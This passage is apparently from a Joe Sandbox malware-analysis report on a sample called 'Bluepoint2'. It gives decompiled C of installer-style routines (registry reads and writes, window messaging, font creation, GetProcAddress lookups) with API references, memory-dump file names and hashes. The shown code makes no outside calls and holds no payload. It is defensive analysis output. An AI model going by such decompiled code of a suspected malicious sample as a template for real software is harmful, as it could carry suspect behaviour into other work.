                                                                                                                                    0x00401e96
                                                                                                                                    0x00401e9a
                                                                                                                                    0x00401ea5
                                                                                                                                    0x00401eac
                                                                                                                                    0x00401ebe
                                                                                                                                    0x00401ec4
                                                                                                                                    0x00401ec9
                                                                                                                                    0x00401ed3
                                                                                                                                    0x00402638
                                                                                                                                    0x0040156d
                                                                                                                                    0x00402ba4
                                                                                                                                    0x00402c2d
                                                                                                                                    0x00402c39

                                                                                                                                    APIs
                                                                                                                                    • GetDC.USER32(?), ref: 00401E51
                                                                                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E6B
                                                                                                                                    • MulDiv.KERNEL32(00000000,00000000), ref: 00401E73
                                                                                                                                    • ReleaseDC.USER32(?,00000000), ref: 00401E84
                                                                                                                                      • Part of subcall function 004066A5: lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 0040684A
                                                                                                                                      • Part of subcall function 004066A5: lstrlenW.KERNEL32(Call,00000000,00422728,?,00405701,00422728,00000000), ref: 004068A4
                                                                                                                                    • CreateFontIndirectW.GDI32(0040CDF8), ref: 00401ED3
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.84104538123.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.84104491889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104632043.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104686670.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104898038.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104954758.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84105014701.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84105061190.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84105117723.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_Bluepoint2.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CapsCreateDeviceFontIndirectReleaselstrcatlstrlen
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2584051700-0
                                                                                                                                    • Opcode ID: da8e727cde32dbac5ba0c7db49ef74d213bcb2a0e3f4fe6d3c107a90d4fe1e84
                                                                                                                                    • Instruction ID: b9cc094806d22c325402cb6ccb5f5134c2025175c414775df3ff87de861ccae2
                                                                                                                                    • Opcode Fuzzy Hash: da8e727cde32dbac5ba0c7db49ef74d213bcb2a0e3f4fe6d3c107a90d4fe1e84
                                                                                                                                    • Instruction Fuzzy Hash: 8401B571900241EFEB005BB4EE89A9A3FB0AB15301F208939F541B71D2C6B904459BED
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 713C16BD Relevance: 7.5, APIs: 5, Instructions: 41memorylibraryloaderCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                    			E713C16BD(struct HINSTANCE__* _a4, short* _a8) {
				_Unknown_base(*)()* _t7;
				void* _t10;
				int _t14;

				_t14 = WideCharToMultiByte(0, 0, _a8, 0xffffffff, 0, 0, 0, 0);
				_t10 = GlobalAlloc(0x40, _t14);
				WideCharToMultiByte(0, 0, _a8, 0xffffffff, _t10, _t14, 0, 0);
				_t7 = GetProcAddress(_a4, _t10);
				GlobalFree(_t10);
				return _t7;
			}






                                                                                                                                    0x713c16d7
                                                                                                                                    0x713c16e3
                                                                                                                                    0x713c16f0
                                                                                                                                    0x713c16f7
                                                                                                                                    0x713c1700
                                                                                                                                    0x713c170c

                                                                                                                                    APIs
                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,713C22D8,?,00000808), ref: 713C16D5
                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,713C22D8,?,00000808), ref: 713C16DC
                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,713C22D8,?,00000808), ref: 713C16F0
                                                                                                                                    • GetProcAddress.KERNEL32(713C22D8,00000000), ref: 713C16F7
                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 713C1700
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.84129670690.00000000713C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 713C0000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.84129620684.00000000713C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84129732994.00000000713C4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84129781776.00000000713C6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_713c0000_Bluepoint2.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1148316912-0
                                                                                                                                    • Opcode ID: 89fd79939c9c2bb1e11406c80b1c322efae4f1ae5b0cf940551184fb39f32c11
                                                                                                                                    • Instruction ID: 56541cbd284baba1caeaf82e073ceb9c4e65cc770e3da3620a91d1dc8fd83923
                                                                                                                                    • Opcode Fuzzy Hash: 89fd79939c9c2bb1e11406c80b1c322efae4f1ae5b0cf940551184fb39f32c11
                                                                                                                                    • Instruction Fuzzy Hash: 92F0AC7324A1387FE6211AA78C4CD9BBE9DEF8B2F5B210215F628D21D086626D01D7F1
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 00401C43 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 59%
                                                                                                                                    			E00401C43(intOrPtr __edx) {
				int _t29;
				long _t30;
				signed int _t32;
				WCHAR* _t35;
				long _t36;
				int _t41;
				signed int _t42;
				int _t46;
				int _t56;
				intOrPtr _t57;
				struct HWND__* _t63;
				void* _t64;

				_t57 = __edx;
				_t29 = E00402D84(3);
				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
				 *(_t64 - 0x18) = _t29;
				_t30 = E00402D84(4);
				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
				 *(_t64 + 8) = _t30;
				if(( *(_t64 - 0x1c) & 0x00000001) != 0) {
					 *((intOrPtr*)(__ebp - 0x18)) = E00402DA6(0x33);
				}
				__eflags =  *(_t64 - 0x1c) & 0x00000002;
				if(( *(_t64 - 0x1c) & 0x00000002) != 0) {
					 *(_t64 + 8) = E00402DA6(0x44);
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x34)) - 0x21;
				_push(1);
				if(__eflags != 0) {
					_t61 = E00402DA6();
					_t32 = E00402DA6();
					asm("sbb ecx, ecx");
					asm("sbb eax, eax");
					_t35 =  ~( *_t31) & _t61;
					__eflags = _t35;
					_t36 = FindWindowExW( *(_t64 - 0x18),  *(_t64 + 8), _t35,  ~( *_t32) & _t32);
					goto L10;
				} else {
					_t63 = E00402D84();
					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
					_t41 = E00402D84(2);
					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
					_t56 =  *(_t64 - 0x1c) >> 2;
					if(__eflags == 0) {
						_t36 = SendMessageW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8));
						L10:
						 *(_t64 - 0x38) = _t36;
					} else {
						_t42 = SendMessageTimeoutW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8), _t46, _t56, _t64 - 0x38);
						asm("sbb eax, eax");
						 *((intOrPtr*)(_t64 - 4)) =  ~_t42 + 1;
					}
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x30)) - _t46;
				if( *((intOrPtr*)(_t64 - 0x30)) >= _t46) {
					_push( *(_t64 - 0x38));
					E004065AF();
				}
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t64 - 4));
				return 0;
			}















                                                                                                                                    0x00401c43
                                                                                                                                    0x00401c45
                                                                                                                                    0x00401c4c
                                                                                                                                    0x00401c4f
                                                                                                                                    0x00401c52
                                                                                                                                    0x00401c5c
                                                                                                                                    0x00401c60
                                                                                                                                    0x00401c63
                                                                                                                                    0x00401c6c
                                                                                                                                    0x00401c6c
                                                                                                                                    0x00401c6f
                                                                                                                                    0x00401c73
                                                                                                                                    0x00401c7c
                                                                                                                                    0x00401c7c
                                                                                                                                    0x00401c7f
                                                                                                                                    0x00401c83
                                                                                                                                    0x00401c85
                                                                                                                                    0x00401cda
                                                                                                                                    0x00401cdc
                                                                                                                                    0x00401ce7
                                                                                                                                    0x00401cf1
                                                                                                                                    0x00401cf4
                                                                                                                                    0x00401cf4
                                                                                                                                    0x00401cfd
                                                                                                                                    0x00000000
                                                                                                                                    0x00401c87
                                                                                                                                    0x00401c8e
                                                                                                                                    0x00401c90
                                                                                                                                    0x00401c93
                                                                                                                                    0x00401c99
                                                                                                                                    0x00401ca0
                                                                                                                                    0x00401ca3
                                                                                                                                    0x00401ccb
                                                                                                                                    0x00401d03
                                                                                                                                    0x00401d03
                                                                                                                                    0x00401ca5
                                                                                                                                    0x00401cb3
                                                                                                                                    0x00401cbb
                                                                                                                                    0x00401cbe
                                                                                                                                    0x00401cbe
                                                                                                                                    0x00401ca3
                                                                                                                                    0x00401d06
                                                                                                                                    0x00401d09
                                                                                                                                    0x00401d0f
                                                                                                                                    0x00402ba4
                                                                                                                                    0x00402ba4
                                                                                                                                    0x00402c2d
                                                                                                                                    0x00402c39

                                                                                                                                    APIs
                                                                                                                                    • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CB3
                                                                                                                                    • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CCB
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.84104538123.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.84104491889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104632043.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104686670.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104898038.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104954758.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84105014701.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84105061190.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84105117723.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_Bluepoint2.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSend$Timeout
                                                                                                                                    • String ID: !
                                                                                                                                    • API String ID: 1777923405-2657877971
                                                                                                                                    • Opcode ID: b183ccb6ab3284ced798d12f720e161a9248df31e23c89b80f307d5b894ef539
                                                                                                                                    • Instruction ID: e1c20d37316975b9b94706f7b3abd8da4b7b3b5136eece5bd2aa3cbae88a6c19
                                                                                                                                    • Opcode Fuzzy Hash: b183ccb6ab3284ced798d12f720e161a9248df31e23c89b80f307d5b894ef539
                                                                                                                                    • Instruction Fuzzy Hash: 28219E7190420AEFEF05AFA4D94AAAE7BB4FF44304F14453EF601B61D0D7B88941CB98
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 0040248A Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64registrystringCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 85%
                                                                                                                                    			E0040248A(void* __eax, int __ebx, intOrPtr __edx) {
				void* _t20;
				void* _t21;
				int _t24;
				char _t27;
				int _t30;
				void* _t32;
				intOrPtr _t33;
				void* _t34;
				intOrPtr _t37;
				void* _t39;
				void* _t42;

				_t33 = __edx;
				_t30 = __ebx;
				_t37 =  *((intOrPtr*)(_t39 - 0x20));
				_t34 = __eax;
				 *(_t39 - 0x10) =  *(_t39 - 0x1c);
				 *(_t39 - 0x44) = E00402DA6(2);
				_t20 = E00402DA6(0x11);
				 *(_t39 - 4) = 1;
				_t21 = E00402E36(_t42, _t34, _t20, 2);
				 *(_t39 + 8) = _t21;
				if(_t21 != __ebx) {
					_t24 = 0;
					if(_t37 == 1) {
						E00402DA6(0x23);
						_t24 = lstrlenW(0x40b5f8) + _t29 + 2;
					}
					if(_t37 == 4) {
						_t27 = E00402D84(3);
						_pop(_t32);
						 *0x40b5f8 = _t27;
						 *((intOrPtr*)(_t39 - 0x38)) = _t33;
						_t24 = _t37;
					}
					if(_t37 == 3) {
						_t24 = E00403371(_t32,  *((intOrPtr*)(_t39 - 0x24)), _t30, 0x40b5f8, 0x1800);
					}
					if(RegSetValueExW( *(_t39 + 8),  *(_t39 - 0x44), _t30,  *(_t39 - 0x10), 0x40b5f8, _t24) == 0) {
						 *(_t39 - 4) = _t30;
					}
					_push( *(_t39 + 8));
					RegCloseKey();
				}
				 *0x42a2e8 =  *0x42a2e8 +  *(_t39 - 4);
				return 0;
			}














                                                                                                                                    0x0040248a
                                                                                                                                    0x0040248a
                                                                                                                                    0x0040248a
                                                                                                                                    0x0040248d
                                                                                                                                    0x00402494
                                                                                                                                    0x0040249e
                                                                                                                                    0x004024a1
                                                                                                                                    0x004024aa
                                                                                                                                    0x004024b1
                                                                                                                                    0x004024b8
                                                                                                                                    0x004024bb
                                                                                                                                    0x004024c1
                                                                                                                                    0x004024cb
                                                                                                                                    0x004024cf
                                                                                                                                    0x004024da
                                                                                                                                    0x004024da
                                                                                                                                    0x004024e1
                                                                                                                                    0x004024e5
                                                                                                                                    0x004024ea
                                                                                                                                    0x004024eb
                                                                                                                                    0x004024f1
                                                                                                                                    0x004024f4
                                                                                                                                    0x004024f4
                                                                                                                                    0x004024f8
                                                                                                                                    0x00402504
                                                                                                                                    0x00402504
                                                                                                                                    0x0040251d
                                                                                                                                    0x0040251f
                                                                                                                                    0x0040251f
                                                                                                                                    0x00402522
                                                                                                                                    0x004025fd
                                                                                                                                    0x004025fd
                                                                                                                                    0x00402c2d
                                                                                                                                    0x00402c39

                                                                                                                                    APIs
                                                                                                                                    • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsh937B.tmp,00000023,00000011,00000002), ref: 004024D5
                                                                                                                                    • RegSetValueExW.ADVAPI32(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsh937B.tmp,00000000,00000011,00000002), ref: 00402515
                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsh937B.tmp,00000000,00000011,00000002), ref: 004025FD
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.84104538123.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.84104491889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104632043.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104686670.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104898038.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104954758.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84105014701.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84105061190.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84105117723.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_Bluepoint2.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CloseValuelstrlen
                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\nsh937B.tmp
                                                                                                                                    • API String ID: 2655323295-2772360390
                                                                                                                                    • Opcode ID: 2c9c4c0baa2399e38114195eed6ba3c931801a1fff8a52bb7ff1bd283087c782
                                                                                                                                    • Instruction ID: a516967871aadb8e7373f7254d3c24ec0cdbd982f2b4049ed7d94b0996b6da2b
                                                                                                                                    • Opcode Fuzzy Hash: 2c9c4c0baa2399e38114195eed6ba3c931801a1fff8a52bb7ff1bd283087c782
                                                                                                                                    • Instruction Fuzzy Hash: 4011AF71E00108BEEF10AFA1CE49EAEB6B8EB44354F11443AF404B61C1DBB98D409658
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 00406536 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 44registryCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 91%
                                                                                                                                    			E00406536(void* __ecx, void* __eflags, char _a4, int _a8, short* _a12, char* _a16, signed int _a20) {
				int _v8;
				long _t21;
				long _t24;
				char* _t30;

				asm("sbb eax, eax");
				_v8 = 0x800;
				_t5 =  &_a4; // 0x422728
				_t21 = E004064D5(__eflags,  *_t5, _a8,  ~_a20 & 0x00000100 | 0x00020019,  &_a20);
				_t30 = _a16;
				if(_t21 != 0) {
					L4:
					 *_t30 =  *_t30 & 0x00000000;
				} else {
					_t24 = RegQueryValueExW(_a20, _a12, 0,  &_a8, _t30,  &_v8);
					_t21 = RegCloseKey(_a20);
					_t30[0x7fe] = _t30[0x7fe] & 0x00000000;
					if(_t24 != 0 || _a8 != 1 && _a8 != 2) {
						goto L4;
					}
				}
				return _t21;
			}







                                                                                                                                    0x00406544
                                                                                                                                    0x00406546
                                                                                                                                    0x0040655b
                                                                                                                                    0x0040655e
                                                                                                                                    0x00406563
                                                                                                                                    0x00406568
                                                                                                                                    0x004065a6
                                                                                                                                    0x004065a6
                                                                                                                                    0x0040656a
                                                                                                                                    0x0040657c
                                                                                                                                    0x00406587
                                                                                                                                    0x0040658d
                                                                                                                                    0x00406598
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00406598
                                                                                                                                    0x004065ac

                                                                                                                                    APIs
                                                                                                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,?,?,0040A230,00000000,('B,00000000,?,?,Call,?,?,0040679D,80000002), ref: 0040657C
                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,0040679D,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,00000000,00422728), ref: 00406587
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.84104538123.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.84104491889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104632043.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104686670.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104898038.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104954758.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84105014701.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84105061190.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84105117723.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_Bluepoint2.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CloseQueryValue
                                                                                                                                    • String ID: ('B$Call
                                                                                                                                    • API String ID: 3356406503-2122505255
                                                                                                                                    • Opcode ID: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                                                                                                                                    • Instruction ID: 52dd0fe420a7c1e2827d1a164217834099ee72e945ce70567094b216899e5676
                                                                                                                                    • Opcode Fuzzy Hash: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                                                                                                                                    • Instruction Fuzzy Hash: C4017C72500209FADF21CF51DD09EDB3BA8EF54364F01803AFD1AA2190D738D964DBA4
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 00405F37 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 58%
                                                                                                                                    			E00405F37(WCHAR* _a4) {
				WCHAR* _t9;

				_t9 = _a4;
				_push( &(_t9[lstrlenW(_t9)]));
				_push(_t9);
				if( *(CharPrevW()) != 0x5c) {
					lstrcatW(_t9, 0x40a014);
				}
				return _t9;
			}




                                                                                                                                    0x00405f38
                                                                                                                                    0x00405f45
                                                                                                                                    0x00405f46
                                                                                                                                    0x00405f51
                                                                                                                                    0x00405f59
                                                                                                                                    0x00405f59
                                                                                                                                    0x00405f61

                                                                                                                                    APIs
                                                                                                                                    • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040362D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00405F3D
                                                                                                                                    • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040362D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00405F47
                                                                                                                                    • lstrcatW.KERNEL32(?,0040A014), ref: 00405F59
                                                                                                                                    Strings
                                                                                                                                    • C:\Users\user\AppData\Local\Temp\, xrefs: 00405F37
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.84104538123.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.84104491889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104632043.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104686670.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104898038.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104954758.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84105014701.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84105061190.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84105117723.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_Bluepoint2.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CharPrevlstrcatlstrlen
                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                    • API String ID: 2659869361-3355392842
                                                                                                                                    • Opcode ID: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
                                                                                                                                    • Instruction ID: 9007417a49851ea4d61da9c71e51c63d156abd36d345156a737e00ee84923012
                                                                                                                                    • Opcode Fuzzy Hash: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
                                                                                                                                    • Instruction Fuzzy Hash: 59D05E611019246AC111AB548D04DDB63ACAE85304742046AF601B60A0CB7E196287ED
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 713C10E1 Relevance: 6.4, APIs: 5, Instructions: 145memoryCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 91%
                                                                                                                                    			E713C10E1(signed int _a8, intOrPtr* _a12, void* _a16, void* _a20) {
				void* _v0;
				void* _t27;
				signed int _t29;
				void* _t30;
				void* _t34;
				void* _t36;
				void* _t38;
				void* _t40;
				void* _t48;
				void* _t54;
				void* _t63;
				void* _t64;
				signed int _t66;
				void* _t67;
				void* _t73;
				void* _t74;
				void* _t77;
				void* _t80;
				void _t81;
				void _t82;
				intOrPtr _t84;
				void* _t86;
				void* _t88;

				 *0x713c506c = _a8;
				 *0x713c5070 = _a16;
				 *0x713c5074 = _a12;
				_a12( *0x713c5048, E713C1651, _t73);
				_t66 =  *0x713c506c +  *0x713c506c * 4 << 3;
				_t27 = E713C12E3();
				_v0 = _t27;
				_t74 = _t27;
				if( *_t27 == 0) {
					L28:
					return GlobalFree(_t27);
				}
				do {
					_t29 =  *_t74 & 0x0000ffff;
					_t67 = 2;
					_t74 = _t74 + _t67;
					_t88 = _t29 - 0x66;
					if(_t88 > 0) {
						_t30 = _t29 - 0x6c;
						if(_t30 == 0) {
							L23:
							_t31 =  *0x713c5040;
							if( *0x713c5040 == 0) {
								goto L26;
							}
							E713C1603( *0x713c5074, _t31 + 4, _t66);
							_t34 =  *0x713c5040;
							_t86 = _t86 + 0xc;
							 *0x713c5040 =  *_t34;
							L25:
							GlobalFree(_t34);
							goto L26;
						}
						_t36 = _t30 - 4;
						if(_t36 == 0) {
							L13:
							_t38 = ( *_t74 & 0x0000ffff) - 0x30;
							_t74 = _t74 + _t67;
							_t34 = E713C1312(E713C135A(_t38));
							L14:
							goto L25;
						}
						_t40 = _t36 - _t67;
						if(_t40 == 0) {
							L11:
							_t80 = ( *_t74 & 0x0000ffff) - 0x30;
							_t74 = _t74 + _t67;
							_t34 = E713C1381(_t80, E713C12E3());
							goto L14;
						}
						L8:
						if(_t40 == 1) {
							_t81 = GlobalAlloc(0x40, _t66 + 4);
							_t10 = _t81 + 4; // 0x4
							E713C1603(_t10,  *0x713c5074, _t66);
							_t86 = _t86 + 0xc;
							 *_t81 =  *0x713c5040;
							 *0x713c5040 = _t81;
						}
						goto L26;
					}
					if(_t88 == 0) {
						_t48 =  *0x713c5070;
						_t77 =  *_t48;
						 *_t48 =  *_t77;
						_t49 = _v0;
						_t84 =  *((intOrPtr*)(_v0 + 0xc));
						if( *((short*)(_t77 + 4)) == 0x2691) {
							E713C1603(_t49, _t77 + 8, 0x38);
							_t86 = _t86 + 0xc;
						}
						 *((intOrPtr*)( *_a12 + 0xc)) = _t84;
						GlobalFree(_t77);
						goto L26;
					}
					_t54 = _t29 - 0x46;
					if(_t54 == 0) {
						_t82 = GlobalAlloc(0x40,  *0x713c506c +  *0x713c506c + 8);
						 *((intOrPtr*)(_t82 + 4)) = 0x2691;
						_t14 = _t82 + 8; // 0x8
						E713C1603(_t14, _v0, 0x38);
						_t86 = _t86 + 0xc;
						 *_t82 =  *( *0x713c5070);
						 *( *0x713c5070) = _t82;
						goto L26;
					}
					_t63 = _t54 - 6;
					if(_t63 == 0) {
						goto L23;
					}
					_t64 = _t63 - 4;
					if(_t64 == 0) {
						 *_t74 =  *_t74 + 0xa;
						goto L13;
					}
					_t40 = _t64 - _t67;
					if(_t40 == 0) {
						 *_t74 =  *_t74 + 0xa;
						goto L11;
					}
					goto L8;
					L26:
				} while ( *_t74 != 0);
				_t27 = _v0;
				goto L28;
			}


























                                                                                                                                    0x713c10eb
                                                                                                                                    0x713c1100
                                                                                                                                    0x713c1109
                                                                                                                                    0x713c110e
                                                                                                                                    0x713c1119
                                                                                                                                    0x713c111c
                                                                                                                                    0x713c1125
                                                                                                                                    0x713c1129
                                                                                                                                    0x713c112b
                                                                                                                                    0x713c12b0
                                                                                                                                    0x713c12ba
                                                                                                                                    0x713c12ba
                                                                                                                                    0x713c1132
                                                                                                                                    0x713c1132
                                                                                                                                    0x713c1137
                                                                                                                                    0x713c1138
                                                                                                                                    0x713c113a
                                                                                                                                    0x713c113d
                                                                                                                                    0x713c1256
                                                                                                                                    0x713c1259
                                                                                                                                    0x713c1271
                                                                                                                                    0x713c1271
                                                                                                                                    0x713c1278
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x713c1285
                                                                                                                                    0x713c128a
                                                                                                                                    0x713c128f
